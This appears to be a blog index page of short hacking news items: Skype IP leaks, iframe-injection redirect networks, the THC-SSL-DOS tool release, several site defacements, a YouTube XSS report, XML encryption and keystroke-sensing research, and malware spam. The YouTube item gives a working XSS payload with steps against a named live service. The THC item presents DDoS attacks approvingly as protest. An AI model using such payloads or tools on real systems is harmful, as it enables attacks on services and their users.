Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Vulnerability
Application Vulnerability Hackers News Privacy Skype Hacks Vulnerability

Anyone can get your IP address using Skype Vulnerability


A New Vulnerability found in skype by NYU-Poly and France’s INRIA that allows to anyone to hack into skype and get your IP address,even a noob can do this.

Even if you are not signedin in skype , Still hacker can get your IP address. With IP address, an attacker can get track your location or get access to your system with Open port.

“The Skype privacy settings fail to protect against our scheme,” the study reports.

In order to do the research, Team of Researchers successfully tracked 10,000 randomly chosen Skype users and launched an attack on those users to get their IP address.

First they successfully retrieved a large number of Skype IDs along with personal information from Skype itself. Then these IDs were called on an hourly basis.

Researchers were able to get the IP addresses by blocking some packets of information that are sent to the Internet. In doing that, they then set up a direct communication between the users’ computers and theirs and then were able to access their IP address, explains Ross.

This technique illustrates how vulnerable people using Skype could be to an attack and potential blackmail, especially if they are somewhere they shouldn’t be, Ross said.

The study found thousands of people at a time could be tracked without much trouble.

Using this vulnerability an attacker can do any cyber crime.

“It’s bad if you’re concerned about your privacy,” said Ross. “A parent could track their children, or a spouse could track the location of his or her spouse. An employer could track all his employees.”

Other real-time voice communication systems are also vulnerable, but don’t have as “serious” a problem as Skype, said Ross.

Those other systems are vulnerable to attacks, but users can actually see that someone unknown is calling them. This isn’t the case in Skype, Ross said.

More than a year ago, Ross and his team reported to skype about this vulnerability but there is no response from their side.

Adrian Asher, Skype's chief information security officer, said that IP addresses are easily uncovered in most web communications clients."Just as with typical Internet communications software, Skype users who are connected may be able to determine each other's IP addresses. Through research and development, we will continue to make advances in this area and improvements to our software," he told.

Read more »
Security News
Hackers News IFrame Injection Malware Attack Malware Report Mass IFrame Injection Security News

Mass Iframe injections used to drive traffic | Traffic Direction System[TDS]


Security Researchers of Sophos noticed the rise in the volume of Mal/Iframe-Gen detections. A Number of sites infected using the Iframe Injection technique. These infected sites are used to drive traffic to another websites(mostly malware sites).


Despite the obfuscation, Sophos products proactively block these malicious scripts as Mal/Iframe-Gen. As suggested from the threat name, the payload of the injected script is to write an iframe to the page:

The iframe points to what appears to be a 'middleman' server, used to bounce the traffic elsewhere. This is commonly known as a Traffic Direction System (TDS). The TDS server is under the control of the attackers, enabling them to configure it to redirect user traffic to wherever required.

At first the Iframe Injection redirects to a freshly registered domain (hosted in Germany). However, the page was unavailable, with all requests getting a 404 error. This was a little surprising given that the attack was new (you expect 404s for old, stale attacks where the compromised sites persist long after the target payload servers have been shut down).

Later the TDS server was updated to redirect the traffic to a new destination. At the time of writing it is redirecting the traffic to a Blackhole exploit pack site, where the victim is bombarded with the usual Flash, Java and PDF exploits.

The illustration below gives an overview of this attack, and the role that the TDS server plays in it.

This attack provides us with a perfect illustration of how user traffic is a commodity. Once they have injected numerous sites to redirect to their TDS, the attacker can essentially sell that user traffic to interested parties, willing to pay for victims to hit their exploit sites.

As ever, protection from this form of attack consists of several components:
  • detection of the malicious redirects injected into the legitimate sites (in this case, proactive detection as Mal/Iframe-Gen).
  • URL filtering to block requests to the TDS. Thus far, a few different servers are being used in these attacks.
  • URL filtering to block requests to the final destination servers.
  • detection of the exploit site itself (Mal/ExpJS-N) and the various malicious files it uses.
  • detection of the final payload (which will vary as the final destination server changes).
  • if all else has failed, runtime protection (HIPs) to catch the malicious payload running on the victim's machine.

Read more »
Software Release
DDOS Tools Hacking Tools Penetration Testing Software Release

THC(The Hacker's Choice) SSL DOS tool released

Today the German hacker group “The Hacker’s Choice” officially released a new DDoS tool. The tool exploits a weakness in SSL to kick a server off the Internet.

Technical details can be found at http://www.thc.org/thc-ssl-dos.

“We decided to make the official release after realizing that this tool leaked to the public a couple of months ago” said a member of THC who wants to remain anonymous.

The tool departs from traditional DDoS tools: It does not require any bandwidth and just a single attack computer (“bot”).

The THC-SSL-DOS attack is en par with other resource exhausting DDoS attacks. Some of those methods played a vital role in demonstrations against oppressive governments (like the DDoS attack against Iran’s leader) and against companies that violate free speech (like the DDoS attack against Mastercard for closing Wikileak’s non-profit donation account because of an alleged typo/misspelling in the application form).

“Here at THC the rights of the citizen and the freedom of speech are at the core of our research”, says a member of THC in a private interview this morning.

“We are hoping that the fishy security in SSL does not go unnoticed. The industry should step in to fix the problem so that citizens are safe and secure again. SSL is using an aging method of protecting private data which is complex, unnecessary and not fit for the 21st century.”, Says a THC member, referring to 3 major vulnerabilities disclosed in SSL over the past 3 years.

To list the 3 major vulnerabilities here THC explains: “In 2009 a vulnerability was disclosed that broke the encryption of SSL. De-facto making all SSL traffic unsafe. In 2011 various Certification Authorities got hacked. De-facto making all SSL traffic unsafe _again_.”

“We warned in 2002 about giving hundreds of commercial companies (so called Certification Authorities) a master key to ALL SSL traffic.”, says Fred Mauer, a senior cryptographer at THC. “Only a real genius can come up with such an idea!”.

“And last but not least the immense complexity of SSL Renegotiation strikes again in 2011 with the release of THC-SSL-DOS.”.

“It’s time for a new security model that adequately protects the citizens.”.

The THC-SSL-DOS tool is a Proof Of Concept tool to disclose fishy security in SSL. It works great if the server supports SSL Renegotiation. It still works if SSL Renegotiation is not supported but requires some modifications and more bots before an effect can be seen.

Our tests reveal that the average server can be taken down from a single IBM laptop through a standard DSL connection.

Taking on larger server farms who make use of SSL Load balancer required 20 average size laptops and about 120kbit/sec of traffic.

All in all superb results.

Interesting here is that a security feature that was supposed to make SSL more secure makes it indeed more vulnerable to this attack:

SSL Renegotiation was invented to renegotiate the key material of an SSL connection. This feature is rarely used. In fact we could not find any software that uses SSL Renegotiation. Yet it’s enabled by default by most servers.

An old saying comes true all over again: Complexity is the enemy of security.

“Renegotiating Key material is a stupid idea from a cryptography standpoint. If you are not happy with the key material negotiated at the start of the session then the session should be re-established and not re-negotiated”, says THC.
Read more »
INTRA
Defaced Website Hackers News Hackers Team INTRA

LG Australia website Hacked and Defaced by INTRA Team


A famous electronics firm LG's Australia website is hacked by INTRA Team.   They defaced the website.

Hacked Site:-
www.lge.com.au
Mirror Link:-
http://www.zone-h.org/mirror/id/15669350

Hackers Message:
It seems as though your website has been hacked.

How did we get past your security?

What security? ;)
The LGE site was taken off the air mid-afternoon Sydney time. They recovered it back and redirect it to www.lg.com/au

It looks they defaced the website using the common Web application vulnerability SQL Injection.

LG said it was alerted to the hack on Friday morning and immediately suspended the site "until the incident is fully investigated". It said the attack only affected lge.com.au, not lg.com.au, which had replaced the former as the "local primary hosting solution" a number of years ago.

You can check the past hacks of INTRA team here:
INTRA Team
Read more »
Youtube Hacks
Vulnerability Web Application Vulnerability XSS Vulnerability Youtube Hacks

Interactive YouTube API Demo Beta Vulnerable to XSS(Cross Site Scripting)


Some white hat hacker named as "Vansh Sharma" discovered the XSS vulnerability in Interactive YouTube API Demo Beta .

The keyword field is vulnerable to XSS .

Proof:
  • Open http://gdata.youtube.com/
  • Enter script
    <img src="<img src=search"/onerror=alert("xss")//">
    in the keyword area.
  • Press ADD
Vulnerability Status:
  • Type: XSS
  • organization: Youtube.com
  • Status: UnFixed
    Read more »
    Youtube Hacks
    Accounts Hacked Hackers News Microsoft Hacks Youtube Hacks

    Microsoft's Official Youtube Channel hacked and All videos deleted



    Microsoft Official Youtube Account is hacked by Unknown hacker. He removed all videos from their channel. Hacker uploaded four videos , all time-stamped within two hours.

    A fifth video was apparently removed.. The video, “Garry’s Mod – Escape the Box,” featured what appeared to be an animated gunman shooting at the inside of a construction box.The channel’s description reads, “I DID NOTHING WRONG I SIMPLY SIGNED INTO MY ACCOUNT THAT I MADE IN 2006 :/"

    Now Mcirosoft recovered the account and uploaded videos back. Still they didn't find how hacker hacked it.
    Read more »
    Cyber Crime
    Cyber Crime

    Hacker Called to Boston Police and claimed he hacked their site because he was bored


    Antisec Hackers hacked a number of U.S websites to support Occupy. One of Victim is Boston Police Patrolmen's Association (BPPA). The hackers leaked the a thousand usernames and passwords. In addition, the AntiSec movement claimed in an online press release to be publishing more than 600MB of data stolen from the International Association of Chief of Police (IACP) website, including names and addresses, passwords and internal documents.

    Names, addresses, phone numbers and social security numbers for police officers in Alabama have also been exposed, and a contact database associated with employees and clients of the internet company Matrix Group made public.

    A Hacker called to Boston Police through Skype and Claimed he hacked their site because he was bored. Here is the part of conversation between caller and Police:
    --------------
    Caller: Your website has been defaced.


    Police official: Yes, we're in the process of uh.. investigating it, but apparently someone hacked into our website, but we've..

    Caller: Yeah that was me.

    Police official: .. shut the website down at this time.


    Caller: The person who did it was me.

    Police official: You hacked into the website?

    Caller: Yes sir.

    Police official: Would you like to tell me why you did it?

    Caller: AntiSec.

    Police official: Is there a particular reason that you did it? Are you trying to prove a point? Or are you just picking on for us any particular reason? What's the problem?


    Caller: Just got a bit bored, y'know.

    Police official: I can't hear you sir.

    Caller: I said, I said I got a bit bored.

    Police official: You got a bit bored?

    Caller: Yeah.

    Police official: That's fine. Alright, well.. perhaps I can break your boredom if we can trace you back and come and put you in jail, we'll get a warrant for you - how's that?

    Caller:Well, I'm not in America.

    Police official: That's okay. That's alright. It doesn't make any difference where you're at.

    Caller:So you're gonna [laughs] come and get me?

    Police official: I'm gonna get on a plane in the next few minutes and head that way, start looking for you somewhere.

    Caller:Bring it on.

    --------------
    The Boston Police department has asked all personnel to reset their passwords, and says that it is launching a full investigation into the reported incidents

    Meanwhile, the IACP website is still unavailable - clearly the site's administrators were more comfortable with visitors seeing a holding page than the defaced version which included an anti-police rap video.

    Read more »
    XtReMiSt
    Defaced Website Mass Defacments MLA XtReMiSt

    100+ Bollywood sites defaced by XtReMiSt (Muslim Liberation Army)

    100+ Indian websites defaced by XtReMiSt (Muslim Liberation Army).  Most of them are related to Bollywood . It includes Bollywood Theatre Guide, Movies, Many Actresses Official Websites .

    Here is few hacked sites:
    Bollywood Hindi Movie & Music - Glamsham(Enfotainment Magazine)
    www.glamsham.com

    bollywood trade news, box office collection figures, movie release calendar etc..
    bollywoodtrade.com

    Mumbai Theatre Guide - Latest Information on Hindi, Marathi & English Plays in Mumbai
    Mumbaitheatreguide.com

    GLAMSHAN FORUMS...
    www.forums.glamsham.com

    GOLD Awards...
    www.goldawards.glamsham.com

    Official Website of bollywood diva Kangna Ranaut
    www.realkangnaranaut.com

    Bollywood super star Mallika Sherawat's official website
    www.mallikasherawatwow.com

    Bollywood super star Mallika Sherawat's official 2nd website
    www.mallikasherawatworld.com

    Jay Chhaniyara - Little Laughter Champion, Comedian
    www.laughwithjay.com

    Trimurti Films Pvt. Ltd.
    www.trimurtifilms.com

    Corporate website of BSK Network & Entertainment Pvt Ltd (Boney Kapoor)
    www.boneykapoor.co.in
    www.bsk.co.in

    Woh Tera Naam Tha(The Movie)
    www.wtnt.glamsham.com

    Sowmya Raoh Official Website(BollyWood)
    www.sowmyaraoh.com

    Yeh Kaise Mohabbat (Movie)
    www.ykm.glamsham.com

    Hisss - A Film by Jennifer Lynch, Official Movie Website
    www.hisssthemovie.com

    Movie director Govind Menon's official website
    www.govindmenonfilms.com

    Sanjay Singh Movies
    www.sanjaysinghfilms.com

    Here is full List:
    http://pastebin.com/icngsdw4
    Read more »
    Security Breach
    Encryption Cracks Security Breach

    XML Encryption is cracked by Researchers of Ruhr University of Bochum


    Researchers of Ruhr University of Bochum(RUB) cracked part of XML Encryption used in Web Services. According to the researchers, IBM, Microsoft and Red Hat Linux use the standard solution in web service applications for a number of large customers. The researchers say that, based on their findings, the standard should now be considered insecure. They plan to publish details about the problem at the upcoming ACM Conference on Computer and Communications Security (ACM CCS 2011) in Chicago.

    The official W3C XML encryption specification is designed to be used to protect data transmitted between online servers such as those used by e-commerce and financial institutions

    As part of their attack, two of the researchers, Juraj Somorovsky and Tibor Jager, sent packets containing modified cipher text to a server. They managed to intercept the packet encrypted with AES in the cipher-block chaining (CBC) mode and then change the initialisation vector (IV) used in the CBC mode. One of the outcomes was error messages from the server when it found an admissible character in XML when it decrypted the specially crafted packet. By sending the packet with different IVs, it was then possible to "guess what the actual message was".

    The researchers say that there is no short-term solution and strongly recommend that the standard be updated. The attack only works when AES is used for encryption in the CBC mode. XML encryption also supports encryption with an RSA key and X.509 certificates. The CBC is also involved in the vulnerability in the TLS 1.0 standard. There, IVs that are not randomly generated for individual blocks make it vulnerable to a chosen-plaintext attack (CPA), which reconstructs encrypted cookies that have been transmitted.

    source: h-online
    Read more »
    Spyware Attack
    iPhone Hacks Research Security News Spyware Attack

    iPhone spyware can be used to capture Desktop computer Key strokes

    iPhone can be used to capture the Desktop computer keystrokes.  Sounds interesting?A team of researchers at Georgia Tech demonstrated how to use the accelerometers of a smartphone to capture the Keystrokes of Desktop Computers by placing nearby.

    Patrick Traynor, an assistant professor in Georgia Tech's School of Computer Science, admits that the technique is difficult to accomplish reliably but claims that the accelerometers built into modern smartphones can sense keyboard vibrations and decipher complete sentences with up to 80% accuracy.

    "We first tried our experiments with an iPhone 3GS, and the results were difficult to read," said Traynor. "But then we tried an iPhone 4, which has an added gyroscope to clean up the accelerometer noise, and the results were much better. We believe that most smartphones made in the past two years are sophisticated enough to launch this attack."

    Researcher posted what displayed in iPhone:

    Presently the spyware cannot determine the pressing of individual keys through the iPhone's accelerometer, but "pairs of keystrokes" instead. The software determines whether the keys are on the right or left hand side of a standard QWERTY keyboard, and then whether the pair of keys are close together or far apart.

    With the characteristics of each pair of keystrokes collected, it compares the results against a dictionary - where each word has been assigned similar measurements.

    For example, take the word "canoe," which when typed breaks down into four keystroke pairs: "C-A, A-N, N-O and O-E." Those pairs then translate into the detection system’s code as follows: Left-Left-Near, Left-Right-Far, Right-Right-Far and Right-Left-Far, or LLN-LRF-RRF-RLF. This code is then compared to the preloaded dictionary and yields "canoe" as the statistically probable typed word.

    For understandable reasons, the technique is said to only work reliably on words which have three or more letters.

    Text recovery

    Henry Carter, one of the study's co-authors, explained the attack scenario that they envisaged could be used:

    "The way we see this attack working is that you, the phone’s owner, would request or be asked to download an innocuous-looking application, which doesn’t ask you for the use of any suspicious phone sensors."

    "Then the keyboard-detection malware is turned on, and the next time you place your phone next to the keyboard and start typing, it starts listening."

    Read more »
    Spam Report
    Anti Malwares Malware Attack Security News Spam Report

    Bloody photos of Gaddafi's death, A spam Mail leads to malware infection


    Malware Attackers take advantage of The death of Libyan dictator Colonel Gaddafi to spread malwares.They have spammed out an attack posing as pictures of Gaddafi's death, tricking users into believing that they came from the AFP news agency and are being forwarded by a fellow internet user.





    Spam Mail:



    Subject: Fw: AFP Photo News: Bloody Photos: Libya dictator Moammar Gadhafi's Death

    Message body:

    Libya dictator Moammar Gadhafi's Death

    Libyan dictator Moammar Gadhafi, the most wanted man in the world, has been killed, the country's rebel government claimed Oct. 20. The flamboyant tyrant who terrorized his country and much of the world during his 42 years of despotic rule was cornered by insurgents in the town of Sirte, where Gadhafi had been born and a stronghold of his supporters.

    Attached file: Bloody Photos_Gadhafi_Death.rar
    If windows users opened the attachement, it will lead to infection of your system.

    Sophos anti-virus products detect the malware proactively as Mal/Behav-103.
    Read more »
    Subscribe to: Comments (Atom)